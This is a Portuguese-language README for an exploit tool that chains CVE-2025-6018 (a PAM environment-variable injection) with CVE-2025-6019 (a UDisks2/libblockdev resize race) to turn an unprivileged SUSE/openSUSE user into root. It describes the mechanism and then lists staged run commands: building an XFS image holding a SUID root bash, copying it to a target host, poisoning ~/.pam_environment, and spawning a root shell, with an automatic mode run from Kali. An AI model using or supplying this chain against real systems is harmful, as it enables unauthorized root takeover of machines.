
# Cadeia de Exploração do CVE-2025-6018 ao CVE-2025-6019
https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
Este exploit combina CVE-2025-6018 e CVE-2025-6019 para obter escalada de privilégios local de um usuário não privilegiado para root em sistemas vulneráveis SUSE/openSUSE. A CVE-2025-6018 é uma vulnerabilidade de injeção de variável de ambiente no PAM (Pluggable Authentication Modules) em pam_env.so (versões 1.3.0-1.6.0) que permite que usuários envenenem seu ambiente de sessão via ~/.pam_environment usando a diretiva OVERRIDE. Ao manipular variáveis de sessão XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE), um atacante pode enganar o systemd-logind para conceder privilégios allow_active do PolicyKit, fazendo a sessão SSH remota parecer uma sessão física local. Uma vez obtido o status allow_active, a CVE-2025-6019 pode ser explorada: esta vulnerabilidade no UDisks2/libblockdev permite que usuários com permissões allow_active montem sistemas de arquivos com opções privilegiadas (exec, suid) através de uma condição de corrida no método D-Bus Filesystem.Resize. Quando uma operação de redimensionamento é acionada em um dispositivo de loop contendo um sistema de arquivos XFS manipulado com um binário bash SUID root, o libblockdev monta automaticamente o sistema de arquivos para realizar o redimensionamento, mas falha ao desmontá-lo devido ao erro de redimensionamento, deixando o bash SUID acessível em /tmp/blockdev*/, que pode então ser executado para obter um shell root.
sudo ./ExploitChain.sh stage1 [caminho_de_saída]
# Padrão: ./xfs.image
# Cria sistema de arquivos XFS de 300MB com bash SUID root
scp xfs.image usuário@<ip_alvo>:/tmp/
./ExploitChain.sh stage2
# Cria ~/.pam_environment com variáveis XDG maliciosas
# DEVE sair e logar novamente para acionar o processamento PAM
logout
ssh usuário@<ip_alvo>
# O PAM processa ~/.pam_environment ao logar
# systemd-logind concede status allow_active
./ExploitChain.sh stage3 /tmp/xfs.image
# Explora a falha Filesystem.Resize do UDisks2
# Monta imagem XFS com bash SUID
# Gera shell root
# No Kali (detecta root automaticamente e executa stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto
# No alvo (detecta estágio automaticamente e executa stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image
./ExploitChain.sh help